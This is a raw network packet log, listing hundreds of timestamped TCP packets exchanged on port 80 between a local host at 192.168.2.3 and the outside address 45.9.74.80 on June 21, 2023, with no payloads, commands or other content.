Jun 21, 2023 04:27:58.452936888 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.452954054 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.452956915 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.452979088 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.453006029 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.453030109 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.453036070 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.453056097 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.453062057 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.453080893 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.453105927 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.453105927 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.453131914 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.453156948 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.453181028 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.453181028 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.453206062 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.453207016 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.453243971 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.453269005 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.453303099 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.453308105 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.453327894 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.453329086 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.453353882 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.453378916 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.453402996 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.453406096 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.453433037 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.476608038 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.476645947 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.476680040 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.476759911 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.476802111 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.476815939 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.476847887 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.476877928 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.476907015 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.476912022 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.476937056 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.476968050 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.476969004 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.476999044 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.477031946 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.477056980 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.477062941 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.477089882 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.477093935 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.477124929 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.477154970 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.477185011 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.477211952 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.477303028 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.477334976 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.477382898 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.477396965 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.477880001 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.478123903 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.478156090 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.478187084 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.478204012 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.478219986 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.478231907 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.478451014 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.478493929 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.478518009 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.478538036 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.478544950 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.478590012 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.478661060 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.478668928 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.478728056 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.478769064 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.478790045 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.478811026 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.478852034 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.478893995 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.478926897 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.478936911 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.478949070 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.478980064 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.479020119 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.479060888 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.479083061 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.479101896 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.479146004 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.479168892 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.479187012 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.479206085 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.479228020 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.479269981 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.479279041 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.479312897 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.479353905 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.479374886 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.479394913 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.479438066 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.479455948 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.479477882 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.479520082 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.479562998 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.479578018 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.479604959 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.479645967 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.479657888 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.479701996 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.479888916 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.479932070 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.479974031 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.479985952 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.480015993 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.480057955 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.480084896 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.480099916 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.480142117 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.480205059 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.480467081 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.480509996 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.480551958 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.480571032 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.480595112 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.480638027 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.480650902 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.480679989 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.480696917 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.480722904 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.480763912 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.480777979 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.480823040 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.480882883 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.480885029 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.480928898 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.481312037 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.481353998 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.481383085 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.481395960 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.481409073 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.481439114 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.481498003 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.481607914 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.481651068 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.481693029 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.481708050 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.481735945 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.481777906 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.481837988 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.481928110 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.481991053 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.482033014 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.482050896 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.482074022 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.482094049 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.482116938 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.482157946 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.482172966 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.482199907 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.482242107 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.482279062 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.482285023 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.482328892 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.482368946 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.482405901 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.482409000 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.482426882 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.482455015 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.482496977 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.482533932 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.482539892 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.482584000 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.482635975 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.482639074 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.482693911 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.482755899 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.504288912 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.504324913 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.504345894 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.504364014 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.504364014 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.504384041 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.504399061 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.504405975 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.504424095 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.504442930 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.504462957 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.504466057 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.504507065 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.504534006 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.504769087 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.504789114 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.504806995 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.504825115 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.504829884 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.504844904 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.504853010 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.504865885 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.504884958 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.504903078 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.504909992 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.504930019 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.505523920 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.505544901 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.505563974 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.505614042 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.505650043 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.506860018 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.506880045 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.506897926 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.506917000 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.506934881 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.506943941 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.506953955 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.506973982 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.506983995 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.506992102 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.507004023 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.507011890 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.507030964 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.507040977 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.507050037 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.507070065 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.507078886 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.507119894 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.507632971 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.507652044 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.507668972 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.507687092 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.507704973 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.507729053 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.507739067 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.507746935 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.507766008 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.507780075 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.507786036 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.507805109 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.507822990 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.507832050 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.507852077 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.507896900 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.507915020 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.507934093 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.507947922 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.507953882 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.507973909 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.508372068 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.508392096 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.508409023 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.508450985 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.508450985 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.508714914 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.508738995 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.508761883 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.508784056 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.508805990 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.508806944 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.508831024 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.508835077 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.508896112 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.508987904 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.509016991 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.509040117 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.509068966 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.509069920 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.509094954 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.509119034 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.509129047 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.509144068 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.509152889 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.509179115 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.509202003 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.509224892 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.509236097 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.509257078 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.509278059 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.509289026 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.509320021 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.509351969 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.509433031 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.509458065 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.509490013 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.509490967 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.509526014 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.509548903 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.509572983 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.509572029 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.509593964 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.510468006 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.510513067 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.510538101 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.510550022 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.510561943 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.510585070 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.510586977 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.510837078 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.510862112 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.510886908 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.510900021 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.510910034 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.510925055 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.510935068 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.510955095 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.510958910 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.510982990 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.511003017 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.511003971 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.511028051 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.511050940 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.511074066 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.511094093 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.511120081 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.511143923 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.511168003 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.511190891 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.511193991 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.511215925 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.511235952 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.511240005 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.511265993 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.511310101 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.531728983 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.531790018 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.531833887 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.531879902 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.531918049 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.531925917 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.531960964 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.531975031 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.531985998 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.532026052 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.532071114 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.532083988 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.532114029 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.532159090 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.532174110 CEST	49719	80	192.168.2.3	45.9.74.80
